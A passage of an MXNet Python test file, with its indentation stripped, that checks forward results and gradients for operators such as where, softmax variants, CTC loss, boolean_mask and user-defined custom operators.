x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert(expect_out.all() == out.all())
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
@with_seed()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
@with_seed()
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)])
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1.bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_seed()
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
import sys
is_windows = sys.platform.startswith('win')
enforce_safe_acc = os.environ.get("MXNET_SAFE_ACCUMULATION", "0")
if not is_windows or enforce_safe_acc == "1":
os.environ["MXNET_SAFE_ACCUMULATION"] = "1"
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
@with_seed()
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
@with_seed()
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0].copy()
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest, outTrain)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
@with_seed()
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
@with_seed()
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
@with_seed()
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
@with_seed()
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
@with_seed()
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
@with_seed()
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
@with_seed()
def test_reciprocal_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 6 below set empirically, depends on eps.
# Issue exposed by seed 879579887.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 6*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
@with_seed()
def test_cbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid finite difference method inaccuracies due to infinite gradient at the origin.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 553872106.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=eps)
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
@with_seed()
def test_rcbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 788174893.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
@with_seed()
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
@with_seed()
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
@with_seed()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
